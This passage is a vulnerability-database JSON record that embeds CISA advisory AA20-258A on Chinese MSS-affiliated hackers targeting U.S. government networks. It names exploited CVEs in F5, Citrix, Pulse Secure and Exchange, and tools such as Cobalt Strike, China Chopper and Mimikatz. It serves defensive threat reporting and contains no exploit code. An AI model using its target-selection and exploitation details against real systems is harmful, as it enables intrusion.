"63D5015A-CD15-54CF-A1CB-67AEEEFFB789", "66506397-D518-518F-B4A6-3C3F99602E30", "6787DC40-24C2-5626-B213-399038EFB0E9", "697CC4E5-B8C5-57DA-8E6E-C44C37811757", "6A34D376-A589-5117-B34C-668A898CD6F2", "721C46F4-C390-5D23-B358-3D4B22959428", "765DCAD5-2789-5451-BBFA-FAD691719F7A", "77912E98-768B-5AF5-AE06-1F42C6D88F72", "7F937E02-A1B2-5F78-B140-90BC298729D4", "88373793-9076-5F05-BDBB-635A7E1BD897", "8CBB7F58-891D-5105-B269-029C59A9C3C9", "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "988A0BAB-669A-57AE-B432-564B2E378252", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "9DA6E85F-7AF2-5EE3-BF5C-A430C8DA3C4D", "9FE15986-BAC9-5740-8189-23E26F8399D5", 
"A1FEA8E3-60B5-5828-A65B-98AA56545D78", "A277C369-9867-5831-8B67-94838FA46118", "A423A009-0EEA-569D-AFFE-89EC01F7CDF7", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "A8BE443F-B43C-5460-9DBF-0E7C65078EF2", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "B417316F-A794-5234-BC9E-475C438FC35C", "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "BC6A00C7-AE9A-533B-87DE-DD27240A818C", "BE88205A-26D3-5EFE-B8CC-828EE7E33C86", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "CFBF5DCB-CF48-542D-A0B2-0019FFA627FA", "D07D56B4-40BB-511F-B7EA-EF5B1544D876", "D4308421-E113-5104-8D37-4FB75AE2D7DC", "D4572C36-FAE8-5802-9B48-CF143220B909", "D8BEFAC3-BA4E-5E7E-8553-B512E126AD53", "DC044D23-6D59-5326-AB78-94633F024A74", "DE558F67-26A7-5F03-AD15-C2087B81E69F", "E10677D8-7D8B-50E5-8180-E47060EC7983", "E2C6B714-1F75-5584-B0B3-280C3B36C014", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "EA2EA382-C5B7-54EF-8547-EDDD15EA1B85", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EBF17036-7547-54B5-B0D6-B465FE6C9873", "EE2763B9-CDEA-5FAF-91CF-8B6902DD2E56", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "F2165DE4-7724-559C-A733-DE9F244DA408", "F22160B4-2E80-5B7D-8238-95D7833F6D73", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD"]}, {"type": "hackerone", "idList": ["H1:1519841", "H1:591295", "H1:617543", "H1:671749", "H1:671857", "H1:678496", "H1:680480", "H1:695005"]}, {"type": "ics", "idList": ["AA18-284A", "AA18-337A", "AA19-024A", "AA19-122A", "AA19-168A", "AA19-290A", "AA19-339A", "AA20-006A", "AA20-010A", "AA20-014A", "AA20-020A", "AA20-031A", "AA20-049A", "AA20-073A", "AA20-099A", "AA20-106A", "AA20-107A", "AA20-120A", "AA20-126A", "AA20-133A", "AA20-182A", "AA20-183A", "AA20-195A", 
"AA20-198A", "AA20-205A", "AA20-206A", "AA20-209A", "AA20-225A", "AA20-227A", "AA20-239A", "AA20-245A", "AA20-258A", "AA20-259A", "AA20-266A", "AA20-275A", "AA20-280A", "AA20-283A", "AA20-296A", "AA20-296B", "AA20-301A", "AA20-302A", "AA20-304A", "AA20-336A", "AA20-345A", "AA20-352A", "AA21-0000A", "AA21-008A", "AA21-042A", "AA21-048A", "AA21-055A", "AA21-062A", "AA21-076A", "AA21-077A", "AA21-110A", "AA21-116A", "AA21-131A", "AA21-148A", "AA21-200A", "AA21-201A", "AA21-209A", "AA21-229A", "AA21-243A", "AA21-259A", "AA21-287A", "AA21-291A", "AA21-321A", "AA21-336A", "AA21-356A", "AA22-011A", "AA22-040A", "AA22-047A", "AA22-054A", "AA22-055A", "AA22-057A", "AA22-074A", "AA22-076A", "AA22-083A", "AA22-103A", "AA22-108A", "AA22-110A", "AA22-117A", "AA22-131A", "AA22-137A", "AA22-138A", "AA22-138B", "AA22-152A", "AA22-158A", "AA22-174A", "AA22-181A", "AA22-187A", "AA22-216A", "AA22-223A", "AA22-228A", "AA22-249A", "AA22-249A-0", "AA22-257A", "AA22-264A", "AA22-265A", "AA22-277A", "AA22-279A", "AA22-294A", "AA22-320A", "AA22-321A", "AA22-335A", "AA23-025A", "AA23-039A", "AA23-040A", "AA23-059A", "AA23-061A", "AA23-074A", "AA23-075A", "AA23-108", "AA23-129A", "AA23-131A", "AA23-136A", "AA23-144A"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:6F67E97EF55C748CBFEE482E85D4751A", "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D"]}, {"type": "kitploit", "idList": ["KITPLOIT:4421457840699592233", "KITPLOIT:4707889613618662864"]}, {"type": "krebs", "idList": ["KREBS:62E2D32C0ABD1C4B8EA91C60B425255B"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:35C65409F622AE1FD9BC7E13896CF1C7", "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", 
"MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8", "MALWAREBYTES:F96D35D14AC570674EB41982220B37CF"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:9AAC6D759E6AD62F92B56B228C39C263"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:9AAC6D759E6AD62F92B56B228C39C263", "MSSECURE:E3C8B97294453D962741782EC959E79C"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995674"]}, {"type": "nessus", "idList": ["CITRIX_NETSCALER_CTX267027.NASL", "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "F5_BIGIP_SOL52145254.NASL", "F5_CVE-2020-5902.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "PAPERCUT_MF_CVE-2023-27350.NBIN", "PAPERCUT_NG_CVE-2023-27350.NBIN", "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "PULSE_CONNECT_SECURE-SA-44101.NASL", "PULSE_CONNECT_SECURE_PATH_TRAVERSAL.NBIN"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154176", "PACKETSTORM:155904", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972", "PACKETSTORM:158333", "PACKETSTORM:158366", "PACKETSTORM:158581", "PACKETSTORM:172022", "PACKETSTORM:172512"]}, {"type": "ptsecurity", "idList": ["PT-2020-01", "PT-2020-04"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:66E92B63FC165BEAF707A9D6B2807033", "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:AF3D80BA12D4BBA1EE3BE23A5E730B6C", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:08ED1091DF14107FE6A0D08832D5A771", 
"RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019", "RAPID7BLOG:F4F1A7CFCF2440B1B23C1904402DDAF2"]}, {"type": "saint", "idList": ["SAINT:265661B74BC72F0361AE7BB83EAC4EA3", "SAINT:648936FBB2CAC7D3895D33C618D275A9"]}, {"type": "securelist", "idList": ["SECURELIST:1B793FC976660636D7A37F563350F59A", "SECURELIST:355BE138D7CDD7D13D1F61F71F8406C4", "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1"]}, {"type": "symantec", "idList": ["SMNTC-111238"]}, {"type": "talosblog", "idList": ["TALOSBLOG:07EF8115BB6D3EE80E914E6572FFCD88", "TALOSBLOG:0D782B308C337CFD06D5A38B03FC90B4", "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "TALOSBLOG:814ED3F1F91D0B8B45726FE2D690E659", "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "TALOSBLOG:D2A31D9DDF7F5C9F3BACAF128071FF23", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A"]}, {"type": "thn", "idList": ["THN:02088F21DB6E2D58FA2FBFDB5C735108", "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:46994B7A671ED65AD9975F25F514C6E3", "THN:4959B86491B72239BCAF1958D167D57D", "THN:49C9DC08E702586D9FA9BB0CF56685EC", "THN:5617A125FD4E30B9B9B0DFCEDCEB8DB2", "THN:6B73AB5566DB08CABFAF90D72C6C6CDE", "THN:6D6F52F8E55C98F540525853C434FD08", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:AE2E46F59043F97BE70DB77C163186E6", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:BCC351AC0BA61400C97A7E529C22A518", "THN:CB99895FF40AEB1E8584201D05BC2390", "THN:CBE86972C4502EF52986B8EF290028F4", "THN:D31DB501A57ADE0C1DBD12724D8CA44C", "THN:DABC62CDC9B66962217D9A8ABA9DF060", "THN:DACFF45926CFB4D006F537C835A3EE55", 
"THN:E35C79A0DEB43A22940D0D123D5D1112", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:EB3F9784BB2A52721953F128D1B3EAEC", "THN:F5AAB2D7C2FD2C0D5083443513D133FF"]}, {"type": "threatpost", "idList": ["THREATPOST:163B67EFAB31CDAD34D25B9194438851", "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "THREATPOST:1D03F5885684829E899CEE4F63F5AC27", "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "THREATPOST:2D47D18D36043D4DFBFAD7C64345410E", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:312E32AA4DC31CFD90D946BC7E36088B", "THREATPOST:3E47C166057EC7923F0BBBE4019F6C75", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:816C2C5C3414F66AD1638248B7321FA1", "THREATPOST:8C45AF2306CB954ACB231C2C0C5EDA9E", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:BC4ECD6616ADCCFFD5717D0A9A0D065B", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:F54AECDBDA250A6122DF9A079CE7AEF3", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:3981EF309A794B1CC15F5BBC6C2B181B", "TRENDMICROBLOG:71352D2908FCBB1B73386712067E79E8", 
"TRENDMICROBLOG:AF253A6BAF5066672B7AB1ECECFCC35B"]}, {"type": "zdi", "idList": ["ZDI-23-233"]}, {"type": "zdt", "idList": ["1337DAY-ID-33140", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-34646", "1337DAY-ID-34647", "1337DAY-ID-34652", "1337DAY-ID-34748", "1337DAY-ID-38623", "1337DAY-ID-38704"]}]}, "score": {"value": 10.9, "vector": "NONE"}, "epss": [{"cve": "CVE-2019-11510", "epss": 0.97517, "percentile": 0.99972, "modified": "2023-05-02"}, {"cve": "CVE-2019-19781", "epss": 0.975, "percentile": 0.99956, "modified": "2023-05-02"}, {"cve": "CVE-2020-5902", "epss": 0.97562, "percentile": 0.99995, "modified": "2023-05-01"}], "vulnersScore": 10.9}, "_state": {"dependencies": 1685741190, "score": 1685718568, "epss": 0}, "_internal": {"score_hash": "21220272a468d098ee20bd2fe283a2d7"}}
{"ics": [{"lastseen": "2023-06-02T15:10:16", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has consistently observed Chinese Ministry of State Security (MSS)-affiliated cyber threat actors using publicly available information sources and common, well-known tactics, techniques, and procedures (TTPs) to target U.S. Government agencies. CISA has observed these\u2014and other threat actors with varying degrees of skill\u2014routinely using open-source information to plan and execute cyber operations. CISA leveraged the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) and Pre-ATT&CK frameworks to characterize the TTPs used by Chinese MSS-affiliated actors. This product was written by CISA with contributions by the Federal Bureau of Investigation (FBI).\n\n### Key Takeaways\n\n * Chinese MSS-affiliated cyber threat actors use open-source information to plan and conduct cyber operations.\n * Chinese MSS-affiliated cyber threat actors use readily available exploits and exploit toolkits to quickly engage target networks.\n * Maintaining a rigorous patching cycle continues to be the best defense against the most frequently used attacks.\n * If critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network.\n * This Advisory identifies some of the more common\u2014yet most effective\u2014TTPs employed by cyber threat actors, including Chinese MSS-affiliated cyber threat actors.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nThrough the operation of the National Cybersecurity Protection System (NCPS) and by fulfilling its mission as the national risk advisor, CISA has observed Chinese 
MSS-affiliated cyber threat actors operating from the People\u2019s Republic of China using commercially available information sources and open-source exploitation tools to target U.S. Government agency networks.\n\nAccording to a recent U.S. Department of Justice indictment, MSS-affiliated actors have targeted various industries across the United States and other countries\u2014including high-tech manufacturing; medical device, civil, and industrial engineering; business, educational, and gaming software; solar energy; pharmaceuticals; and defense\u2014in a campaign that lasted over ten years.[[1](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)] These hackers acted for both their own personal gain and the benefit of the Chinese MSS.[[2](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)]\n\nAccording to the indictment,\n\n_To conceal the theft of information from victim networks and otherwise evade detection, the defendants typically packaged victim data in encrypted Roshal Archive Compressed files (RAR files), changed RAR file and victim documents\u2019 names and extensions (e.g., from \u201c.rar\u201d to \u201c.jpg\u201d) and system timestamps, and concealed programs and documents at innocuous-seeming locations on victim networks and in victim networks\u2019 \u201crecycle bins.\u201d The defendants frequently returned to re-victimize companies, government entities, and organizations from which they had previously stolen data, in some cases years after the initial successful data theft. In several instances, however, the defendants were unsuccessful in this regard, due to the efforts of the FBI and network defenders._\n\nThe continued use of open-source tools by Chinese MSS-affiliated cyber threat actors highlights that adversaries can use relatively low-complexity capabilities to identify and exploit target networks. 
In most cases, cyber operations are successful because misconfigurations and immature patch management programs allow actors to plan and execute attacks using existing vulnerabilities and known exploits. Widespread implementation of robust configuration and patch management programs would greatly increase network security. It would also reduce the speed and frequency of opportunistic attacks by forcing threat actors to dedicate time and funding to research unknown vulnerabilities and develop custom exploitation tools.\n\n### MITRE PRE-ATT&CK\u00ae Framework for Analysis\n\nIn the last 12 months, CISA analysts have routinely observed Chinese MSS-affiliated actors using the following PRE-ATT&CK\u00ae Framework TTPs.\n\n#### Target Selection and Technical Information Gathering\n\n_Target Selection_ [[TA0014](<https://attack.mitre.org/versions/v7/tactics/TA0014/>)] is a critical part of cyber operations. While cyber threat actors\u2019 motivations and intents are often unknown, they often make their selections based on the target network\u2019s security posture. Threat actors can use information sources such as Shodan, the Common Vulnerabilities and Exposures (CVE) database, and the National Vulnerability Database (NVD).[[3](<https://www.shodan.io/>)][[4](<https://cve.mitre.org/>)][[5](<https://nvd.nist.gov/>)]\n\n * Shodan is an internet search engine that can be used to identify vulnerable devices connected to the internet. Shodan queries can also be customized to discover specific vulnerabilities on devices, which enables sophisticated cyber threat actors to use relatively unsophisticated techniques to execute opportunistic attacks on susceptible targets.\n * The CVE database and the NVD contain detailed information about vulnerabilities in applications, appliances, and operating systems that can be exploited by cyber threat actors if they remain unpatched. 
These sources also provide risk assessments if any of the recorded vulnerabilities are successfully exploited.\n\nThese information sources have legitimate uses for network defense. CISA analysts are able to identify Federal Government systems that may be susceptible to exploitation attempts by using Shodan, the CVE database, and the NVD to enrich NCPS information. Unlike threat actors, CISA takes the necessary actions to notify network owners of their exposure in order to prevent an impending intrusion or quickly identify intrusions as they occur.\n\nWhile using these data sources, CISA analysts have observed a correlation between the public release of a vulnerability and targeted scanning of systems identified as being vulnerable. This correlation suggests that cyber threat actors also rely on Shodan, the CVE database, the NVD, and other open-source information to identify targets of opportunity and plan cyber operations. Together, these data sources provide users with the understanding of a specific vulnerability, as well as a list of systems that may be vulnerable to attempted exploits. These information sources therefore contain invaluable information that can lead cyber threat actors to implement highly effective attacks.\n\nCISA has observed Chinese MSS-affiliated actors using the techniques in table 1 to gather technical information to enable cyber operations against Federal Government networks (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/versions/v7/tactics/TA0015/>)]).\n\n_Table 1: Technical information gathering techniques observed by CISA_\n\n| MITRE ID | Name | Observation |\n|---|---|---|\n| [T1245](<https://attack.mitre.org/versions/v7/techniques/T1245/>) | Determine Approach/Attack Vector | The threat actors narrowed the attack vectors to relatively recent vulnerability disclosures with open-source exploits. |\n| [T1247](<https://attack.mitre.org/versions/v7/techniques/T1247/>) | Acquire Open Source Intelligence (OSINT) Data Sets and Information | CISA observed activity from network proxy service Internet Protocol (IP) addresses to three Federal Government webpages. This activity appeared to enable information gathering activities. |\n| [T1254](<https://attack.mitre.org/versions/v7/techniques/T1254/>) | Conduct Active Scanning | CISA analysts reviewed the network activity of known threat actor IP addresses and found evidence of reconnaissance activity involving virtual security devices. |\n\n#### Technical Weakness Identification\n\nCISA analysts consistently observe targeting, scanning, and probing of significant vulnerabilities within days of their emergence and disclosure. This targeting, scanning, and probing frequently leads to compromises at the hands of sophisticated cyber threat actors. In some cases, cyber threat actors have used the same vulnerabilities to compromise multiple organizations across many sectors. Organizations do not appear to be mitigating known vulnerabilities as quickly as cyber threat actors are exploiting them. CISA recently released an alert that highlighted the top 10 vulnerabilities routinely exploited by sophisticated foreign cyber threat actors from 2016 to 2019.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20>)]\n\nAdditionally, table 2 provides a list of notable compromises by Chinese MSS-affiliated actors within the past 12 months.\n\n_Table 2: Significant CVEs targeted by Chinese MSS-affiliated actors in the last 12 months_\n\n| Vulnerability | Observations |\n|---|---|\n| CVE-2020-5902: F5 Big-IP Vulnerability | CISA has conducted incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2020-5902. 
This is a vulnerability in F5\u2019s Big-IP Traffic Management User Interface that allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code.[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a%20>)] |\n| CVE-2019-19781: Citrix Virtual Private Network (VPN) Appliances | CISA has observed the threat actors attempting to discover vulnerable Citrix VPN Appliances. CVE-2019-19781 enabled the actors to execute directory traversal attacks.[[8](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a%20>)] |\n| CVE-2019-11510: Pulse Secure VPN Servers | CISA has conducted multiple incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.[[9](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a%20%20>)] |\n| CVE-2020-0688: Microsoft Exchange Server | CISA has observed the actors exploiting CVE-2020-0688 for remote code execution to enable email collection of targeted networks. |\n\nAdditionally, CISA has observed Chinese MSS-affiliated actors using the techniques listed in table 3 to identify technical weaknesses in Federal Government networks (_Technical Weakness Identification_ [[TA0018](<https://attack.mitre.org/versions/v7/tactics/TA0018/>)]). 
\n\n_Table 3: Technical weakness identification techniques observed by CISA_\n\n| MITRE ID | Name | Observation |\n|---|---|---|\n| [T1288](<https://attack.mitre.org/versions/v7/techniques/T1288/>) | Analyze Architecture and Configuration Posture | CISA observed the cyber actors scanning a Federal Government agency for vulnerable web servers. CISA also observed the threat actors scanning for network appliances vulnerable to CVE-2019-11510. |\n| [T1291](<https://attack.mitre.org/versions/v7/techniques/T1291/>) | Research Relevant Vulnerabilities | CISA has observed the threat actors conducting scanning and reconnaissance of Federal Government internet-facing systems shortly after the disclosure of significant CVEs. |\n\n#### Build Capabilities\n\nCISA analysts have observed cyber threat actors using command and control (C2) infrastructure as part of their cyber operations. These observations also provide evidence that threat actors can build and maintain relatively low-complexity capabilities, such as C2, to enable cyber operations against Federal Government networks (_Build Capabilities_ [[TA0024](<https://attack.mitre.org/versions/v7/tactics/TA0024/>)]). CISA has observed Chinese MSS-affiliated actors using the build capabilities summarized in table 4.\n\n_Table 4: Build capabilities observed by CISA_\n\n| MITRE ID | Name | Observation |\n|---|---|---|\n| [T1352](<https://attack.mitre.org/versions/v7/techniques/T1352/>) | C2 Protocol Development | CISA observed beaconing from a Federal Government entity to the threat actors\u2019 C2 server. |\n| [T1328](<https://attack.mitre.org/versions/v7/techniques/T1328/>) | Buy Domain Name | CISA has observed the use of domains purchased by the threat actors. |\n| [T1329](<https://attack.mitre.org/versions/v7/techniques/T1329/>) | Acquire and / or use of 3rd Party Infrastructure | CISA has observed the threat actors using virtual private servers to conduct cyber operations. |\n| [T1346](<https://attack.mitre.org/versions/v7/techniques/T1346>) | Obtain/Re-use Payloads | CISA has observed the threat actors use and reuse existing capabilities. |\n| [T1349](<https://attack.mitre.org/versions/v7/techniques/T1349>) | Build or Acquire Exploit | CISA has observed the threat actors using a variety of open-source and publicly available exploits and exploit code to compromise Federal Government networks. |\n\n### MITRE ATT&CK Framework for Analysis\n\nCISA has observed sophisticated cyber threat actors, including Chinese MSS-affiliated actors, using commercial and open-source tools to conduct their operations. For example, threat actors often leverage internet software repositories such as GitHub and Exploit-DB.[[10](<https://www.GitHub.com%20>)][[11](<https://exploit-db.com%20>)] Both repositories are commonly used for legitimate software development, penetration testing, and open-source code sharing, but cyber threat actors can also use them to find code that enables nefarious actions.\n\nDuring incident response activities, CISA frequently observed Chinese government-affiliated actors using the open-source tools outlined in table 5.\n\n_Table 5: Common exploit tools CISA observed used by Chinese MSS-affiliated actors_\n\n| Tool | Observations |\n|---|---|\n| [Cobalt Strike](<https://attack.mitre.org/versions/v7/software/S0154/>) | CISA has observed the threat actors using Cobalt Strike to target commercial and Federal Government networks. Cobalt Strike is a commercial penetration testing tool used to conduct red team operations. 
It contains a number of tools that complement the cyber threat actor\u2019s exploitation efforts, such as a keystroke logger, file injection capability, and network services scanners. CISA observed connections from a Federal Government agency to multiple IP addresses possibly hosting Cobalt Strike team servers. |\n| [China Chopper Web Shell](<https://attack.mitre.org/versions/v7/software/S0020/>) | CISA has observed the actors successfully deploying China Chopper against organizations\u2019 networks. This open-source tool can be downloaded from internet software repositories such as GitHub and Exploit-DB. China Chopper is a web shell hosted on a web server. It is mainly used for web application attacks, and it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. |\n| [Mimikatz](<https://attack.mitre.org/versions/v7/software/S0002/>) | CISA has observed the actors using Mimikatz during their operations. 
This open-source tool is used to capture account credentials and perform privilege escalation with pass-the-hash attacks that allow an attacker to pass captured password hashes and authenticate to network devices.[[12](<https://www.varonis.com/blog/what-is-mimikatz/%20>)] \n \nThe following sections list the ATT&CK Framework TTPs routinely employed by Chinese government-affiliated actors to conduct cyber operations as observed by CISA analysts.\n\n#### Initial Access \n\nIn the last 12 months, CISA has observed Chinese MSS-affiliated actors use spearphishing emails with embedded links to actor-owned infrastructure and, in some cases, compromise or poison legitimate sites to enable cyber operations.\n\nCISA has observed the threat actors using the _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] techniques identified in table 6.\n\n_Table 6: Initial access techniques observed by CISA_\n\n**MITRE ID**\n\n| \n\n**Name**\n\n| \n\n**Observation** \n \n---|---|--- \n \n[T1204.001](<https://attack.mitre.org/versions/v7/techniques/T1204/001/>)\n\n| \n\nUser Execution: Malicious Link\n\n| \n\nCISA has observed indications that users have clicked malicious links embedded in spearphishing emails that the threat actors sent \n \n[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002>)\n\n| \n\nPhishing: Spearphishing Link\n\n| \n\nCISA analyzed network activity of a Federal Government entity and concluded that the threat actors sent a malicious email weaponized with links. \n \n[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190>)\n\n| \n\nExploit Public-Facing Application\n\n| \n\nCISA has observed the actors leveraging CVE-2019-19781 to compromise Citrix Application Delivery Controllers. 
\n \nCyber threat actors can continue to successfully launch these types of low-complexity attacks\u2014as long as misconfigurations in operational environments and immature patch management programs remain in place\u2014by taking advantage of common vulnerabilities and using readily available exploits and information.\n\n#### Execution \n\nCISA analysts continue to observe beaconing activity indicative of compromise or ongoing access to Federal Government networks. This beaconing is a result of cyber threat actors successfully completing cyber operations that are often designed around emergent vulnerabilities and reliant on existing exploitation tools, as mentioned in this document.\n\nCISA has observed Chinese MSS-affiliated actors using the _Execution _[[TA0002](<https://attack.mitre.org/versions/v7/tactics/TA0002/>)] technique identified in table 7.\n\n_Table 7: Execution technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1072](<https://attack.mitre.org/versions/v7/techniques/T1072>)\n\n| \n\nSoftware Deployment Tools\n\n| \n\nCISA observed activity from a Federal Government IP address beaconing out to the threat actors\u2019 C2 server, which is usually an indication of compromise. \n \n#### Credential Access \n\nCyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks. While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals. 
